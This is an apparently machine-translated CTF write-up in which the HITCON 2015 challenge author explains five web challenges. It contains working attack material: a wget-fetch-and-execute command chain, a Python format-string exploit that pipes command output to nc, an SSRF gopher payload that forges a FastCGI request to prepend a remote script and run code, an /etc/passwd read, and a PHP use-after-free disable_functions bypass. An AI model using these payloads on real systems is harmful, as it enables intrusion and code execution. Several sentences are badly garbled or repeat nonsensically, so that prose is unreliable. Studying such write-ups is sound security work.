Orange. Tw, 2015/10/20 also

[email protected] Blog: blog.orange.tw

P.S. related codes are posted on Github. If you are interested in studying them, you can take a look at the code and try to solve it.

Written after HITCON CTF 2015 Quals as a member of the team, I have to say that the difficulty of XD is not a little high, but as a DEFCON seed, I think it can be said to live up to its name! 🙂

This time responsible for all the Web topics are self-confident for selfish work, put some of their recent research into the topic XD for the response of participants, let them feel difficult when solving the problem, but after the solution will have the feeling of “so”, “can also play like this” is the main purpose of my topic XD

0x01 100 BabyFirst (33 team solution)


#! php <? php highlight_file(__FILE__); $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR']; if ( ! file_exists($dir) ) mkdir($dir); chdir($dir); $args = $_GET['args']; for ( $i=0; $i<count($args); $i++ ){ if ( ! preg_match('/^\w+$/', $args[$i]) ) exit(); } exec("/bin/orange " . implode(" ", $args)); ? >Copy the code

Gist.github.com/orangetw/cb…

The simplest topic on the Web, pure code analysis and only 15 lines of code was solved two hours after the contest started

If the match multiline is not match multiline, use \n. If the match multiline is match multiline, use \n. If the match multiline is match multiline, use \n. Every team has a different idea so there are many ways to do it!

My own official solution is

mkdir orange
cd orange
wget HEXED_IP
tar cvf payload orange
php payload
Copy the code

I can execute any code I want

You can see from the log that the other teams did it

busybox ftpget ...  
Copy the code

or

twistd telnet ...  
Copy the code

or

Wget HEX_IP // gives a 302 Redirect to the FTP protocol, which is the most amazing XD // also check the wget source code to say that the generated index.html should not be controlled. It turns out that the FTP Protocol can be controlledCopy the code

In general, I also saw the various limits of playing Command Line. I think it is the most successful question for the most question makers who have learned many uses of XD. It is simple, fun and interesting!

0x02 200 nanana (18 team solutions)


Gist.github.com/orangetw/49…

xxd -r -p nanana.xxd > nanana
Copy the code

The name Web is actually a Pwn problem which only provides binary but does not provide libcgid. So must solve this problem without library! Format String but no output (sprintf). Replace do_job’s GOT with system’s PLT address

The only thing to note though is that the stack Guard should be used to override the ARGV1 of Stack Smashing Detected to achieve any address leakage and the password should be leaked to make better use of it, but because of 64-bits and the delivery can’t have any If ARGV1 is NULL in username, ARGV1 is NULL in username. If ARGV1 is NULL in username, ARGV1 is NULL in job Overwrite the memory position (0x601090) by three bytes before the remaining five bytes are just NULL for any address read

For details of exploits, please refer to

#! python import requests from urllib import urlencode from struct import pack, Unpack URL = 'http://54.92.88.102/cgi-bin/nanana' def leak(address): address = pack('I', address) address = address.strip('\x00') payload = { 'username': 'A'*349, 'password': 'B'*380, 'job': 'C'*392 + address } r = requests.get(URL+'? '+urlencode(payload)) l = r.headers['*** stack smashing detected ***'] l = l.strip(' terminated') l = l.ljust(8, '\x00') try: return unpack('Q', l) except: return l def e(cmd, pwd): payload = { 'username': cmd, 'password': pwd, 'job': '\x48\x10\x60', 'action': '%198x%15$hhn' } print urlencode(payload) r = requests.get(URL+'? '+urlencode(payload)) if __name__ == '__main__': The PWD = leak (0 x601090) print 'PWD @ % s' % PWD e (' id | nc 127.0.0.1 12345', the PWD = PWD)Copy the code

Gist.github.com/orangetw/58…

0x03 300 Giraffe’s Coffee (16 teams solution)


Gist.github.com/orangetw/4a…

It’s also the subject of code analysis

The core concept is the prediction of PRNG in PHP. Since it is difficult for computers to be truly “random”, most random trees are now generated based on PRNG. PRNG is implemented by the Mersenne Twister algorithm in PHP

In the absence of a seed, php_mt_RAND will seed the current PID and time with some calculations. The seed is 32-bits long, so it is hackable

Some people will use off-the-shelf tools and find that they fail, The PRNG cannot be predicted with certainty because PHP is preforked under Apache so every wire is picked from a process that has already been forked so it is impossible to determine the current PRNG Whether the STATE is the first time and the process on each connection may not be the same, so the STATE is even more unpredictable (existing tools only calculate the first time after the seed for comparison).

This can be solved by using the keep-alive method to ensure that the same process is connected, and then adding more states to the original seed crack (624 states in total).

0x04 400 Lalala (2 team solution)


The core concept of a service that can upload images to users or provide a url to help them capture and upload images is to bypass the SSRF with the 302 Redirect, and to implement remote code execution using the FastCGI prtocol native to the SSRF via Gopher

302 can be used to do SSRF when capturing images (actually many people ignore the beauty of 302 when studying SSRF)

Can read documents in SSRF (Location: file://localhost/etc/passwd)

The server architecture uses Nginx + php-fpm, where php-fpm fastCGI protocol runs as a bind port on the machine

In the real world, as long as you find the other party’s PHP FastCGI can be connected to the outside of the shell, so use Gopher to construct FastCGI Protocol access to the native 9001 port can be arbitrary code execution

Location: gopher://127.0.0.1:9001/x%01%01i%13%00%08%00%00%00%01%00%00%00%00%00%00%01%04i%13%00%8B%00%00%0E%03REQUEST_METHODGET%0F% 0FSCRIPT_FILENAME/_www/index.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D% 20http%3A//orange.tw/x%01%04i%13%00%00%00%00%01%05i%13%00%00%00%00Copy the code

(use PHP_ADMIN_VALUE to set allow_URl_include to ON and add auto_prepend_file to your site)

Another interesting aspect of this problem is that if you have implemented SSRF with Gopher, you will find that Java gopher can only accept 0x00-0x7f libcurl gopher can only accept 0x01-0xFF

The curl_exec in ontology using PHP, then use to libcurl cannot use NULL Byte but tectonic FastCGI Protocol must be NULL Byte not later to study about libcurl source code, Commit (NULL Byte); commit (NULL Byte); XD

Github.com/bagder/curl…

Libcurl/curl can now use NULL Byte XD

0x05 500 Use-after-flee (1 team solve)


Most of the time, when doing penetration testing, you will see open_basedir and DISABle_functions prevent you from accessing other sites on the same hosting host

PHP has had many holes in Memory throughout its history, and this is one of them.

Codz Hacking is just PoC ()

Github.com/80vul/phpco…

Using use-after-free to circumvent this restriction sounds simple, but there are a lot of protections you have to deal with in today’s operating systems

  1. DEP
  2. FULL ASLR
  3. PIE (Apache default open)
  4. FULL RELRO (Apache default on)
  5. Because the environment was on Apache + mod_PHP, and PHP was loaded into Apache as a Library, reuse was increased (it was easy to Exploit pure CLI), for example dealing with Parsing ELF’s XD

But PPP was the best team and the only team to do it just one and a half hours before the end of the game! It’s a bit of a shame, though, because the competition is on EC2 Ubuntu 14.04 64-bits, So for libc offset, they directly take the libc offset of other Pwn problems instead of finding the offset through STRTAB, SYMTAB, JMPREL 🙂

Ricky’s writeup in PPP

Github.com/pwning/publ…

Ricky’s use is to change the handler in the ZVAL structure into the position of system, and the ZVAL type is declared as OBJECT and refcount is 0

struct _zval_struct {
  zvalue_value value;
  zend_uint refcount__gc;
  zend_uchar type;
  zend_uchar is_ref__gc;
};
Copy the code

Destruct will automatically do destruct if it finds a reference to 0 during processing and throws ZVAL as an argument to handler. There is an 8 bytes instruction limit that can be used (so Ricky uses sh /*/a; However, the length limit becomes 4 bytes in 32-bits and is almost impossible to take advantage of in XD

A more elegant solution would be to change the GOT Hijacking system (temporarily) to fopen (temporarily), call it, and let it take control of anything it wants

write($open_got, $system_address);
fopen("| $cmd", "r");
Copy the code

So you can try to Exploit it and find a way to perfect it! 😛

There are so many tricks and problems to solve in the world of Web Security that I am proud to be a Web dog 🙂